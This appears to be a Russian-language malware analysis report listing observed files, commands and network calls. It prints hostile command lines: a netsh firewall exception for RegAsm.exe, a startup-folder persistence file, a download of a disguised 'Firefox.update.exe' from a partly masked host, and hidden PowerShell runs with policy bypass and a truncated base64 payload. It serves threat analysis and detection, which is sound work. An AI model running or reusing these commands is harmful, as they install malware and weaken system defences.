Техническая информация (наблюдаемые файлы, запускаемые команды и сетевые обращения)
- %APPDATA%\microsoft\windows\start menu\programs\startup\logoff.url
- '%WINDIR%\syswow64\netsh.exe' firewall add allowedprogram "%WINDIR%\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe" "RegAsm.exe" ENABLE
- %WINDIR%\microsoft.net\framework\v2.0.50727\regasm.exe
- %TEMP%\~df329e58821f778b50i.exe
- %HOMEPATH%\logoff\logoff.vbs
- %HOMEPATH%\logoff\rmttpmvscmgrsvr.exe
- http://th###ahotel.com/Firefox.update.exe
- DNS ASK th###ahotel.com
- '%TEMP%\~df329e58821f778b50i.exe'
- '%WINDIR%\syswow64\cmd.exe' "/c POWeRShELL.ExE -EX byPASs -nOp -w Hidden -Ec IAAJAAkAcwBlAHQALQBjAG8ATgBUAEUAbgB0AAkACQAgAC0AVgBhACAACQAJACgACQAgACAAJgAoAGcAYwBtACAATgBFAHcALQBvACoAKQAgAAkACQBOAEUAVAAuAHcAZQBC...' (со скрытым окном)
- '%WINDIR%\syswow64\netsh.exe' firewall add allowedprogram "%WINDIR%\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe" "RegAsm.exe" ENABLE' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' "/c POWeRShELL.ExE -EX byPASs -nOp -w Hidden -Ec IAAJAAkAcwBlAHQALQBjAG8ATgBUAEUAbgB0AAkACQAgAC0AVgBhACAACQAJACgACQAgACAAJgAoAGcAYwBtACAATgBFAHcALQBvACoAKQAgAAkACQBOAEUAVAAuAHcAZQBC...
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -EX byPASs -nOp -w Hidden -Ec IAAJAAkAcwBlAHQALQBjAG8ATgBUAEUAbgB0AAkACQAgAC0AVgBhACAACQAJACgACQAgACAAJgAoAGcAYwBtACAATgBFAHcALQBvACoAKQAgAAkACQBOAEUAVAAuAHcAZQBCAEMATABJAGUAbgB0AAkAIAAJA...
- '%WINDIR%\microsoft.net\framework\v2.0.50727\regasm.exe'